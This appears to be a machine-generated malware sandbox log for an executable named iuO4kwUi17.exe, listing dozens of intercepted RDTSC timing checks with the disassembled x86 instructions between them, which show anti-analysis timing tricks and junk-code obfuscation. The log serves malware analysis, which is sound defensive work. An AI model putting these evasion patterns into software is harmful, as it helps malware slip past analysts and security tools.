Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10EC612 second address: 10EC618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1084810 second address: 1084814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10939FE second address: 1093A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jno 00007F9308CAD926h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9308CAD934h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1093A21 second address: 1093A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10F6A40 second address: 10F6A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10F6A44 second address: 10F6A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10FD2FC second address: 10FD34E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jo 00007F9308CAD935h 0x00000014 jmp 00007F9308CAD92Fh 0x00000019 mov eax, dword ptr [eax] 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F9308CAD938h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1082E17 second address: 1082E1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1101243 second address: 1101251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F9308CAD926h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1101251 second address: 110125B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F930851C676h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 110125B second address: 1101262 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 110152D second address: 1101531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11016A5 second address: 11016AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11016AA second address: 11016B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1101ADF second address: 1101AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F9308CAD926h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1105E43 second address: 1105E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F930851C676h 0x0000000a pop ecx 0x0000000b push edi 0x0000000c jmp 00007F930851C67Eh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1105E60 second address: 1105E75 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F9308CAD92Ch 0x00000008 pop edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 110B064 second address: 110B084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F930851C689h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 110B226 second address: 110B22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 110B22B second address: 110B253 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F930851C67Ch 0x00000008 jl 00007F930851C676h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F930851C686h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 110B253 second address: 110B257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 110AC57 second address: 110AC77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F930851C676h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jng 00007F930851C676h 0x00000013 jc 00007F930851C676h 0x00000019 jc 00007F930851C676h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D6D02 second address: 10D6D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D6D08 second address: 10D6D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 js 00007F930851C67Ch 0x0000000e jnp 00007F930851C678h 0x00000014 popad 0x00000015 nop 0x00000016 pushad 0x00000017 ja 00007F930851C679h 0x0000001d xor dword ptr [ebp+122D2FA7h], edi 0x00000023 popad 0x00000024 sub dword ptr [ebp+122D1EBBh], esi 0x0000002a lea eax, dword ptr [ebp+1248EB42h] 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F930851C678h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a push eax 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D6D68 second address: 10B2E7B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9308CAD92Dh 0x0000000c jmp 00007F9308CAD931h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F9308CAD928h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 jc 00007F9308CAD926h 0x00000036 xor dword ptr [ebp+122D2F7Ah], edx 0x0000003c call dword ptr [ebp+122D19EAh] 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jnl 00007F9308CAD926h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D6E98 second address: 10D6E9D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D6F38 second address: 10D6F3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D6F3C second address: 10D6F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F930851C678h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D71F6 second address: 10D71FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D7286 second address: 10D72B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 6BAD547Fh 0x0000000d sub ecx, dword ptr [ebp+122D3840h] 0x00000013 push 3F6707E7h 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F930851C686h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D7366 second address: 10D736C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D7408 second address: 10D7418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jbe 00007F930851C680h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D775D second address: 10D7767 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9308CAD926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D7767 second address: 10D77BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C686h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F930851C678h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 or cl, 00000064h 0x00000029 mov edx, eax 0x0000002b push 00000004h 0x0000002d jmp 00007F930851C680h 0x00000032 push eax 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D7C6E second address: 10D7C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D7C74 second address: 10D7C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D8011 second address: 10D8015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D8015 second address: 10D801B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D801B second address: 10D80A8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9308CAD928h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F9308CAD928h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 lea eax, dword ptr [ebp+1248EB86h] 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F9308CAD928h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 nop 0x0000004a pushad 0x0000004b jc 00007F9308CAD928h 0x00000051 push ebx 0x00000052 pop ebx 0x00000053 pushad 0x00000054 jmp 00007F9308CAD92Eh 0x00000059 jmp 00007F9308CAD935h 0x0000005e popad 0x0000005f popad 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push ecx 0x00000064 pushad 0x00000065 popad 0x00000066 pop ecx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D80A8 second address: 10D80E5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F930851C678h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F930851C678h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 lea eax, dword ptr [ebp+1248EB42h] 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f je 00007F930851C676h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D80E5 second address: 10D80EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D80EA second address: 10B39DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007F930851C676h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F930851C678h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push ebx 0x0000002a mov dword ptr [ebp+1247DA69h], ecx 0x00000030 pop edi 0x00000031 call dword ptr [ebp+12453F68h] 0x00000037 push ebx 0x00000038 pushad 0x00000039 jmp 00007F930851C67Ah 0x0000003e jmp 00007F930851C686h 0x00000043 push eax 0x00000044 pop eax 0x00000045 popad 0x00000046 jmp 00007F930851C67Ch 0x0000004b pop ebx 0x0000004c push ecx 0x0000004d pushad 0x0000004e pushad 0x0000004f popad 0x00000050 ja 00007F930851C676h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10904B6 second address: 10904BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1110FBE second address: 1110FDE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F930851C676h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F930851C684h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1110FDE second address: 1110FE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1110FE4 second address: 1110FE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1111139 second address: 1111174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pop edx 0x00000008 push edi 0x00000009 jmp 00007F9308CAD92Ch 0x0000000e pushad 0x0000000f jmp 00007F9308CAD934h 0x00000014 jmp 00007F9308CAD92Dh 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11112B3 second address: 11112D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C686h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11112D3 second address: 11112F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Fh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007F9308CAD926h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11112F1 second address: 11112F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11112F7 second address: 11112FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11112FC second address: 111131F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C687h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b ja 00007F930851C676h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 111131F second address: 1111329 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9308CAD926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1111492 second address: 1111496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1111496 second address: 11114B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F9308CAD936h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11114B6 second address: 11114BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11114BA second address: 11114CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD92Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11114CB second address: 11114D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F930851C676h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 111194F second address: 1111955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1111955 second address: 111195B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 111195B second address: 1111968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F9308CAD92Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1111968 second address: 111196C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 111196C second address: 111198A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9308CAD92Eh 0x00000008 jo 00007F9308CAD932h 0x0000000e ja 00007F9308CAD926h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1117802 second address: 1117806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1117806 second address: 111780C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11163F6 second address: 1116443 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C686h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F930851C68Ch 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F930851C67Bh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1116883 second address: 1116898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F9308CAD92Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1116CE2 second address: 1116CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1116CE6 second address: 1116D0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD938h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1116FE4 second address: 1117010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F930851C67Eh 0x0000000d jmp 00007F930851C67Ah 0x00000012 popad 0x00000013 pushad 0x00000014 jbe 00007F930851C676h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 111768B second address: 11176A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD930h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11176A5 second address: 11176A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1115FA6 second address: 1115FAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1115FAA second address: 1115FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1115FB5 second address: 1115FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 111D8C8 second address: 111D8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F930851C683h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F930851C682h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 111D8EB second address: 111D8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 111D8F1 second address: 111D90B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F930851C686h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 111D90B second address: 111D938 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9308CAD932h 0x00000008 push ebx 0x00000009 jmp 00007F9308CAD936h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 111D225 second address: 111D22F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F930851C676h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 111F951 second address: 111F969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F9308CAD92Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 111F969 second address: 111F97F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C682h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
